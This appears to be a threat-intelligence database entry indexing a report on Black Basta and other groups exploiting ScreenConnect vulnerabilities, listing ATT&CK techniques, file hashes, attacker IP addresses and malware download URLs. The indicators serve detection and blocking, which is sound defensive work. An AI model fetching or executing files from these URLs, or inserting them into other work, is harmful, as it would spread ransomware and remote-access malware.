ioc[.]one - OSINT Cyber Threat Intelligence Database

Threat Actor Groups, Including Black Basta, are Exploiting Recent ScreenConnect Vulnerabilities

Tags

cmtmf-attack-pattern:	Exploit Public-Facing Application
country:	Belgium
attack-pattern:	Data Direct Data Encrypted For Impact - T1471 Data Encrypted For Impact - T1486 Default Accounts - T1078.001 Dns - T1071.004 Dns - T1590.002 Domain Trust Discovery - T1482 Domains - T1583.001 Domains - T1584.001 Email Account - T1087.003 Exfiltration Over C2 Channel - T1646 Exploit Public-Facing Application - T1377 Exploits - T1587.004 Exploits - T1588.005 Impair Defenses - T1562 Ingress Tool Transfer - T1544 Local Account - T1087.001 Local Accounts - T1078.003 Malware - T1587.001 Malware - T1588.001 Msiexec - T1218.007 Powershell - T1059.001 Remote Access Software - T1663 Rundll32 - T1218.011 Screensaver - T1546.002 Server - T1583.004 Server - T1584.004 Software - T1592.002 Tool - T1588.002 Vulnerabilities - T1588.006 Account Discovery - T1087 Exfiltration Over Command And Control Channel - T1041 Exploit Public-Facing Application - T1190 Remote File Copy - T1105 Powershell - T1086 Remote Access Tools - T1219 Rundll32 - T1085 Screensaver - T1180 Exploit Public-Facing Application

Show in Graph

Common Information

Type	Value
UUID	6c90cfdd-3152-411a-ae03-427e7c53b648
Fingerprint	a4762cd0eb3f8787
Analysis status	DONE
Considered CTI value	2
Text language
Published	Feb. 27, 2024, midnight
Added to db	Oct. 15, 2024, 4:19 p.m.
Last updated	Nov. 17, 2024, 6:56 p.m.
Headline	Threat Actor Groups, Including Black Basta, are Exploiting Recent ScreenConnect Vulnerabilities
Title	Threat Actor Groups, Including Black Basta, are Exploiting Recent ScreenConnect Vulnerabilities
Detected Hints/Tags/Attributes	100/3/73

Source URLs

	Redirection	Url
Details	Source	https://www.trendmicro.com/en_sg/research/24/b/threat-actor-groups-including-black-basta-are-exploiting-recent-.html
Details	Source	https://www.trendmicro.com/en_my/research/24/b/threat-actor-groups-including-black-basta-are-exploiting-recent-.html
Details	Source	https://www.trendmicro.com/en_au/research/24/b/threat-actor-groups-including-black-basta-are-exploiting-recent-.html
Details	Source	https://www.trendmicro.com/en_nz/research/24/b/threat-actor-groups-including-black-basta-are-exploiting-recent-.html
Details	Source	https://www.trendmicro.com/en_in/research/24/b/threat-actor-groups-including-black-basta-are-exploiting-recent-.html

URL Provider

Details	Provider	Source level domain
Details	trendmicro.com	www.trendmicro.com

Attributes

Details	Type	#Events	Value
Details	CVE	25	cve-2024-1708
Details	CVE	29	cve-2024-1709
Details	CVE	140	cve-2023-27350
Details	Domain	25	the.net
Details	Domain	7	in.net
Details	Domain	5	wipresolutions.com
Details	Domain	2	dns.artstrailreviews.com
Details	Domain	45	paste.ee
Details	Domain	2	input-beats.gl.at.ply.gg
Details	Domain	71	transfer.sh
Details	Domain	2	instance-tj4lui-relay.screenconnect.com
Details	Domain	272	outlook.com
Details	Email	2	integratorlogin=pichet1208@outlook.com
Details	File	11	web.dll
Details	File	6	setupwizard.aspx
Details	File	2	screenconnect.zip
Details	File	3	screenconnect.core
Details	File	256	net.exe
Details	File	49	nltest.exe
Details	File	1208	powershell.exe
Details	File	2	diablo.log
Details	File	2	c:\users\public\diablo.log
Details	File	1018	rundll32.exe
Details	File	2	09d.log
Details	File	2	c:\users\public\09d.log
Details	File	2	10443.exe
Details	File	2	c:\users\public\10443.exe
Details	File	1122	svchost.exe
Details	File	226	certutil.exe
Details	File	3	msappdata.msi
Details	File	3	c:\mpyutd.msi
Details	File	409	c:\windows\system32\cmd.exe
Details	File	2	c:\mpyuts.msi
Details	File	2	read_instructions_to_decrypt.txt
Details	File	2	chromeset.exe
Details	File	2	c:\chromeset.exe
Details	File	1	c:\windows\system32\naet.exe
Details	File	5	c:\windows\system32\bitsadmin.exe
Details	File	2	c:\programdata\sc.exe
Details	File	27	c:\windows\system32\msiexec.exe
Details	File	20	setup.msi
Details	sha256	2	cc13b5721f2ee6081c1244dd367a9de958353c29e32ea8b66e3b20b293fabc55
Details	sha256	2	fa131238c3c35efe99cde59dd409c0436fd642b6bf5d56f994f52ab3a62bae4e
Details	sha256	2	e3401d7699cc5067620e43bd24e8ccd437832c16f2fa7d5baaad8c170383cc92
Details	sha256	3	8e51de4774d27ad31a83d5df060ba008148665ab9caf6bc889a5e3fba4d7e600
Details	sha256	2	3a659609850664cbc0683c8c7b92be816254eb9306e7fb12ad79d5a9af0fb623
Details	sha256	2	47d83461ee57031fd2814382fb526937a4cfa9a3eea7a47e4e7ee185c0602b27
Details	sha256	2	86b5d7dd88b46a3e7c2fb58c01fbeb11dc7ad350370abfe648dbfad45edb8132
Details	IPv4	3	159.65.130.146
Details	IPv4	3	23.26.137.225
Details	MITRE ATT&CK Techniques	43	T1078.003
Details	MITRE ATT&CK Techniques	124	T1482
Details	MITRE ATT&CK Techniques	41	T1078.001
Details	MITRE ATT&CK Techniques	179	T1087
Details	MITRE ATT&CK Techniques	460	T1059.001
Details	MITRE ATT&CK Techniques	235	T1562
Details	MITRE ATT&CK Techniques	492	T1105
Details	MITRE ATT&CK Techniques	22	T1087.003
Details	MITRE ATT&CK Techniques	72	T1087.001
Details	MITRE ATT&CK Techniques	141	T1219
Details	MITRE ATT&CK Techniques	542	T1190
Details	MITRE ATT&CK Techniques	422	T1041
Details	MITRE ATT&CK Techniques	472	T1486
Details	Url	2	http://207.[246.74.189:804/download/diablo.log
Details	Url	2	http://51.[195.192.120:804/download/09d.log
Details	Url	2	http://198.[244.169.213:8045/download/10443.exe
Details	Url	2	http://159.65.130.146:4444/a
Details	Url	2	http://159.65.130.146:4444/svchost.exe
Details	Url	3	http://23.26.137.225:8084/msappdata.msi
Details	Url	2	http://23.26.137.225:8091/chromeset.exe
Details	Url	2	https://paste.ee/r/mzeoz/0
Details	Url	2	https://paste.ee/r/pxlkv/0
Details	Url	2	https://transfer.sh/get/hcrhqun0yc/temp3.exe